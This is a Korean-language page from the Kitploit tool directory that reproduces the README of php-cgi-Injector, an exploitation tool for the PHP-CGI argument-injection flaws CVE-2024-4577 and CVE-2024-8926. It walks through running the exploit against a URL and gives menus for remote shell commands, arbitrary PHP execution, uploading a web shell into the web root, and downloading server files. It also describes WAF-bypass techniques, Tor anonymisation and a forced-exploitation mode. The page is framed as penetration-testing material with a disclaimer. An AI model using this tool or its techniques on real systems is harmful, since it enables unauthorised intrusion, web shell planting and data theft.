Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
php-cgi-Injector — CVE-2024-4577과 CVE-2024-8926을 테스트하는 보안 침투 도구 | Kitploit
도구/GitHubGitHub/night-have-dreams/php-cgi-injector
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationWAF BypassPenetration TestingCommand and Control
GitHubnight-have-dreams/php-cgi-injector

php-cgi-Injector

CVE-2024-4577과 CVE-2024-8926을 테스트하는 보안 침투 도구

저장소 보기
4921년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PHP-CGI 인젝터

🚀 CVE-2024-4577 및 CVE-2024-8926 익스플로잇 도구

PHP-CGI 매개변수 주입 취약점을 대상으로 하는 자동화 테스트 도구로, CVE-2024-4577 및 CVE-2024-8926을 지원하며 명령 실행, 파일 업로드, 다운로드 등의 작업을 수행할 수 있습니다.


📌 소개

본 도구는 PHP-CGI 환경에서의 매개변수 주입 취약점을 테스트하는 데 사용할 수 있으며, 다음 기능을 제공합니다:

  • ✅ 멋진 터미널 인터페이스 및 애니메이션 효과
  • ✅ 자동화된 취약점 스캔
  • ✅ 다양한 공격 모드(Shell, PHP 코드 실행, 파일 업로드/다운로드)
  • ✅ 기본 및 사용자 정의 Payload 조합
  • ✅ Tor 트래픽 숨김 모드
  • ✅ 다양한 WAF 우회 모듈
  • ✅ 출력 인코딩 자동 변환 지원
  • ✅ 강제 익스플로잇 모드(취약점이 스캔되지 않아도 시작 가능)
  • ❌ 커피 내리기는 지원하지 않지만, WAF 굽기는 지원합니다.
  • ❌ 보고서 작성, 연애 성공, 대학원 합격을 대신해 주지 않습니다.
  • ❌ 사회공학을 지원하지 않습니다. 인간 상대는 직접 해결하세요.

📜 면책 조항

본 도구는 합법적인 테스트 및 학술 목적으로만 사용해야 하며, 승인되지 않은 시스템에 사용하지 마십시오!

⚠️ 불법 사용 시 법적 책임을 질 수 있습니다!

본 도구는 다음 용도로만 제공됩니다:

  • 🔹 기업 레드팀 침투 테스트
  • 🔹 CTF 보안 연구
  • 🔹 개인 보안 학습
  • 🔹 법적 승인을 받은 기타 보안 테스트

📥 의존성 설치

본 도구는 다음과 같은 Python 패키지에 의존하므로 먼저 설치하세요:

root@kitploit:~
pip install -r requirements.txt

또는 수동으로 설치:

root@kitploit:~
pip install requests requests-tor chardet urllib3 rich

🛠️ 사용 방법

📌 기본 사용법

root@kitploit:~
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]

예시:

root@kitploit:~
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php

📌 매개변수 옵션


📌 동작 모드

스크립트가 취약점을 찾으면 다음 메뉴가 표시됩니다:

root@kitploit:~
╭────────────  Exploit 모드 메뉴  ────────────╮
│ 현재 대상: http://example.com/              │
│ 현재 주입 지점: /php-cgi/php-cgi.exe        │
│ 취약점 번호: CVE-2024-4577                  │
╰────────────────────────────────────────────╯
1) 🧪 Shell 모드
2) 🛠️ PHP 사용자 정의 모드
3) 📤 파일 업로드
4) 📥 파일 다운로드
5) 🎯 공격 대상 전환
6) ⚙️ 매개변수 설정
7) ❌ 프로그램 종료
>>

📌 모드 상세 설명

1️⃣ Shell 모드

시스템 명령 실행:

root@kitploit:~
shell> whoami

📂 출력 저장

root@kitploit:~
shell> whoami --save
root@kitploit:~
shell> whoami --save C:\output\whoami.txt

2️⃣ PHP 사용자 정의 모드

사용자 정의 PHP 코드 실행:

root@kitploit:~
phpinfo();
EOF

📂 출력 저장

root@kitploit:~
phpinfo();
EOF --save
root@kitploit:~
phpinfo();
EOF --save C:\output\info.html

3️⃣ 파일 업로드

root@kitploit:~
로컬 파일 경로: C:\test\shell.php
대상 전체 경로:
[*] 업로드 경로가 자동으로 설정되었습니다: C:/xampp/htdocs/shell.php

📂 경로 수동 지정

root@kitploit:~
대상 전체 경로: C:\xampp\php\shell.php

4️⃣ 파일 다운로드

root@kitploit:~
원격 파일 경로: C:\xampp\htdocs\index.php

📂 파일 다운로드 후 download/에 저장되며, 중복되면 자동으로 번호가 추가됩니다

root@kitploit:~
[*] 파일 다운로드 완료, download/index.php에 저장됨

5️⃣ 공격 대상 전환

root@kitploit:~
새 대상 URL 입력: http://newtarget.com

🔹 취약점을 다시 테스트합니다


6️⃣ 매개변수 전환

root@kitploit:~
[⚙️ 익스플로잇 단계 매개변수 설정 메뉴]

1) Payload 전환              1
2) Bypass 우회 모듈          선택 안 됨
3) 대기 시간 Timeout         10 초
4) 요청 지연 Delay           0 초
5) 자동 기록 Log             꺼짐
6) 상세 모드 Verbose         꺼짐
7) 애니메이션 효과 Effects   켜짐
8) 강제 이용 Force           꺼짐
9) 저장하고 Exploit 메뉴로 돌아가기

📌 Bypass WAF 우회 모듈

다음 우회 전략을 제공합니다:

  • CGI 경로 변형
  • Payload 앞뒤에 무효 문자 추가
  • php://input을 다른 표현으로 교체
  • 특정 또는 무작위 HTTP 헤더 추가
  • POST 콘텐츠 난독화
  • Payload 순서 무작위 혼합
  • 사용자 정의 우회 스크립트, 형식은 tamper_example_template.txt 참조

도구 다운로드
매개변수설명예시
-u , --url대상 URL 지정-u http://example.com
--timeout sec요청 제한 시간 설정(0은 무한)--timeout 30
--logshell 명령 자동 기록--log
--payloadPayload 조합 지정 또는 사용자 정의--payload 2
--torTor를 통해 요청 전송--tor
--verbose상세 정보 표시--verbose
--bypassWAF 우회 모드 활성화--bypass
--force강제로 익스플로잇 모드 진입--force
--cgipoint PATHS테스트할 특정 CGI 경로 지정--cgipoint /path
--delay sec각 요청 사이의 지연 시간(초)--delay 1.5
--no-effects모든 애니메이션 및 지연 효과 비활성화--no-effects